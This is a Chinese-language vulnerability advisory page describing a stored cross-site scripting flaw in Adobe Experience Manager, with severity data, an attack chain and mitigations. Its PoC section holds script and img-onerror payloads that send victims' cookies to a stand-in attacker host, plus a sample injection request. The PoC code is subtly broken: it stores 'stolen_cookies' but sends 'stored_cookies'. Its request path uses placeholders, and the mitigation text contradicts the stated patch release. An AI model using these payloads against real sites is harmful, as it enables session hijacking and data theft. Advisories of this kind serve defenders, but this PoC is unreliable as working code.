CVE-2025-64847: Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64847

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64847是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞，CVSS评分5.4，属于中等严重程度。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者可以利用此漏洞通过低权限账户在易受攻击的表单字段中注入恶意脚本。当受害者浏览包含该漏洞字段的页面时，恶意JavaScript代码将在其浏览器中执行，从而可能导致会话劫持、敏感信息窃取或进一步的恶意操作。此漏洞需要用户交互才能触发，攻击者需要具备低权限访问权限。由于是存储型XSS，恶意脚本会被永久保存在服务器端，影响所有访问该页面的用户。Adobe官方已发布安全公告APSB25-115来应对此漏洞，建议用户尽快升级到修复版本以消除安全风险。

技术细节

该漏洞为存储型XSS(CWE-79)，存在于Adobe Experience Manager的表单处理模块中。攻击流程如下：1)低权限攻击者首先访问AEM系统，找到存在输入验证不足的表单字段；2)攻击者在表单输入框中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>；3)由于系统未对用户输入进行充分的HTML转义或输入验证，恶意脚本被存储在服务器数据库中；4)当其他用户访问包含该表单内容的页面时，服务器将存储的恶意内容直接返回给客户端浏览器；5)浏览器将恶意脚本作为页面的一部分执行，从而窃取用户会话Cookie、劫持用户操作或进行其他恶意行为。由于Adobe Experience Manager是企业级内容管理系统，通常包含敏感业务数据和用户信息，此类XSS漏洞可能导致严重的业务安全风险。修复此漏洞需要在所有用户可控的输出点实施适当的输出编码，并对用户输入进行严格的验证和清理。

攻击链分析

STEP 1

侦察阶段

攻击者获取Adobe Experience Manager系统的低权限访问权限，识别系统中存在输入验证不足的表单字段

STEP 2

漏洞利用

攻击者在易受攻击的表单字段中注入恶意JavaScript代码，如<script>标签或事件处理器属性

STEP 3

数据持久化

由于系统未进行充分的输入验证和输出编码，恶意脚本被永久存储在服务器数据库中

STEP 4

触发执行

当受害者(普通用户或管理员)访问包含该表单内容的页面时，服务器将存储的恶意内容返回给客户端

STEP 5

恶意行为执行

受害者浏览器将恶意脚本作为页面正常内容执行，导致Cookie窃取、会话劫持或敏感信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64847 PoC: Stored XSS in Adobe Experience Manager Form Fields -->
<!-- Attacker with low privileges injects malicious script -->

<!-- Step 1: Inject XSS payload into vulnerable form field -->
<script>
  // Malicious script to be stored and executed
  var stolen_cookies = document.cookie;
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://attacker.com/exfiltrate', true);
  xhr.send('cookies=' + encodeURIComponent(stored_cookies));
</script>

<!-- Alternative payload using img tag -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">

<!-- Step 2: When victim views the page containing the injected field, the script executes -->
<!-- The PoC demonstrates how low-privileged users can inject persistent scripts -->
<!-- that will execute in all visitors' browsers -->

<!-- Example POST request to inject payload -->
<!-- POST /content/forms/af/[form-name]/jcr:content/guideContainer.af.submit.jsp HTTP/1.1 -->
<!-- Content-Type: application/x-www-form-urlencoded -->
<!-- -->
<!-- [vulnerable-field-name]=<script>alert(document.domain)</script>&other_field=value -->

影响范围

Adobe Experience Manager 6.5.23及更早版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制低权限用户对表单编辑功能的访问权限；2)启用AEM的XSS过滤功能；3)部署WAF(Web应用防火墙)规则检测和阻止XSS攻击载荷；4)加强对表单提交内容的实时监控和审计；5)提醒用户避免点击来源不明的链接；6)定期扫描应用程序以发现潜在的XSS漏洞点。